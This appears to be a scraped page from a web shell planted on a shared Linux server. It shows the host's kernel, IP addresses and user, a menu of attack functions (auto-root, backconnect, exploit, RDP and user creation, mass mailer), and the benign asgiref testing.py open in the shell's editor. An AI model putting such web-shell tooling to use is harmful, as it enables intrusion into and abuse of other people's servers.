Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3 /
dist-packages /
asgiref /
[ HOME SHELL ]
Name
Size
Permission
Action
__pycache__
[ DIR ]
drwxr-xr-x
__init__.py
22
B
-rw-r--r--
compatibility.py
1.56
KB
-rw-r--r--
current_thread_executor.py
2.74
KB
-rw-r--r--
local.py
4.74
KB
-rw-r--r--
py.typed
0
B
-rw-r--r--
server.py
5.86
KB
-rw-r--r--
sync.py
18.85
KB
-rw-r--r--
testing.py
3.05
KB
-rw-r--r--
timeout.py
3.36
KB
-rw-r--r--
typing.py
5.47
KB
-rw-r--r--
wsgi.py
6.42
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : testing.py
import asyncio import time from .compatibility import guarantee_single_callable from .timeout import timeout as async_timeout class ApplicationCommunicator: """ Runs an ASGI application in a test mode, allowing sending of messages to it and retrieval of messages it sends. """ def __init__(self, application, scope): self.application = guarantee_single_callable(application) self.scope = scope self.input_queue = asyncio.Queue() self.output_queue = asyncio.Queue() self.future = asyncio.ensure_future( self.application(scope, self.input_queue.get, self.output_queue.put) ) async def wait(self, timeout=1): """ Waits for the application to stop itself and returns any exceptions. """ try: async with async_timeout(timeout): try: await self.future self.future.result() except asyncio.CancelledError: pass finally: if not self.future.done(): self.future.cancel() try: await self.future except asyncio.CancelledError: pass def stop(self, exceptions=True): if not self.future.done(): self.future.cancel() elif exceptions: # Give a chance to raise any exceptions self.future.result() def __del__(self): # Clean up on deletion try: self.stop(exceptions=False) except RuntimeError: # Event loop already stopped pass async def send_input(self, message): """ Sends a single message to the application """ # Give it the message await self.input_queue.put(message) async def receive_output(self, timeout=1): """ Receives a single message from the application, with optional timeout. """ # Make sure there's not an exception to raise from the task if self.future.done(): self.future.result() # Wait and receive the message try: async with async_timeout(timeout): return await self.output_queue.get() except asyncio.TimeoutError as e: # See if we have another error to raise inside if self.future.done(): self.future.result() else: self.future.cancel() try: await self.future except asyncio.CancelledError: pass raise e async def receive_nothing(self, timeout=0.1, interval=0.01): """ Checks that there is no message to receive in the given time. """ # `interval` has precedence over `timeout` start = time.monotonic() while time.monotonic() - start < timeout: if not self.output_queue.empty(): return False await asyncio.sleep(interval) return self.output_queue.empty()
Close